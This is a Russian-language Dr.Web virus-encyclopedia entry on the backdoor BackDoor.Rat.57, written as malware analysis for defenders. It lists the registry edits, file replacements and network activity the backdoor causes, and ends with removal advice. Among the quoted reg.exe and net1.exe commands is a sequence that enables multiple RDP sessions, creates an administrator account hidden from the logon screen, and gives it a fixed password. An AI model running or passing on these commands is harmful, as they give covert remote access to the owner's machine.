Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

BackDoor.Rat.57

Добавлен в вирусную базу Dr.Web: 2012-01-13

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Создает следующие сервисы:
  • [<HKLM>\SYSTEM\ControlSet001\Services\TermDD] 'Start' = '00000002'
  • [<HKLM>\SYSTEM\ControlSet001\Services\TermService] 'Start' = '00000002'
Заражает следующие исполняемые системные файлы:
  • <SYSTEM32>\dllcache\termsrv.dll
Подменяет следующие исполняемые системные файлы:
  • <SYSTEM32>\termsrv.dll файлом <SYSTEM32>\termsrv.dll.tmp
  • <SYSTEM32>\termsrv.dll файлом <SYSTEM32>\termsrv.dll
Вредоносные функции:
Запускает на исполнение:
  • <SYSTEM32>\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d "00000001" /f
  • <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableConcurrentSessions /t REG_DWORD /d "00000001" /f
  • <SYSTEM32>\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d "00000000" /f
  • <SYSTEM32>\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d "00000000" /f
  • <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllowMultipleTSSessions /t REG_DWORD /d "00000001" /f
  • <SYSTEM32>\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d "00000000" /f
  • <SYSTEM32>\shutdown.exe -r -f
  • <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v MaxInstanceCount /t REG_DWORD /d "00000005" /f
  • <SYSTEM32>\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d "00000000" /f\
  • <SYSTEM32>\net1.exe accounts /maxpwage:unlimited
  • <SYSTEM32>\net1.exe localgroup %USERNAME%s SUPPORT_MS14594 /add
  • <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installe" /v EnableAdminTSRemote /t REG_DWORD /d "00000001" /f
  • <SYSTEM32>\net1.exe user SUPPORT_MS14594 123456 /add
  • <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SUPPORT_MS14594 /t REG_DWORD /d "00000000" /f
  • <SYSTEM32>\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\TermService" /v Start /t REG_DWORD /d "00000002" /f
  • <SYSTEM32>\net1.exe localgroup "Remote Desktop Users" SUPPORT_MS14594 /add
  • <SYSTEM32>\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\TermDD" /v Start /t REG_DWORD /d "00000002" /f
  • <SYSTEM32>\net1.exe localgroup Администраторы SUPPORT_MS14594 /add
  • <SYSTEM32>\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSEnabled /t REG_DWORD /d "00000001" /f
Пытается завершить работу операционной системы Windows.
Изменения в файловой системе:
Создает следующие файлы:
  • %APPDATA%\Microsoft\CryptnetUrlCache\Content\79841F8EF00FBA86D33CC5A47696F165
  • %APPDATA%\Microsoft\CryptnetUrlCache\MetaData\79841F8EF00FBA86D33CC5A47696F165
  • <SYSTEM32>\termsrv.dll.tmp
  • <SYSTEM32>\termsrv.dll.backup
  • %APPDATA%\Microsoft\CryptnetUrlCache\Content\3C83474D61E624A4F9844DF935AFE217
  • %APPDATA%\Microsoft\CryptnetUrlCache\MetaData\3C83474D61E624A4F9844DF935AFE217
  • %APPDATA%\Microsoft\CryptnetUrlCache\Content\303572DF538EDD8B1D606185F1D559B8
  • %APPDATA%\Microsoft\CryptnetUrlCache\MetaData\303572DF538EDD8B1D606185F1D559B8
Удаляет следующие файлы:
  • C:\_@1.tmp
Перемещает следующие системные файлы:
  • <SYSTEM32>\termsrv.dll в C:\_@1.tmp
Сетевая активность:
Подключается к:
  • 'crl.verisign.com':80
  • '20#.#6.232.182':80
  • 'wp#d':80
TCP:
Запросы HTTP GET:
  • crl.verisign.com/ThawteTimestampingCA.crl
  • crl.verisign.com/tss-ca.crl
  • wp#d/wpad.dat
  • 20#.#6.232.182/pki/crl/products/WindowsPCA.crl
UDP:
  • DNS ASK crl.microsoft.com
  • DNS ASK crl.verisign.com
  • DNS ASK wp#d
  • '<IP-адрес в локальной сети>':1035
Другое:
Ищет следующие окна:
  • ClassName: 'Shell_TrayWnd' WindowName: ''

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке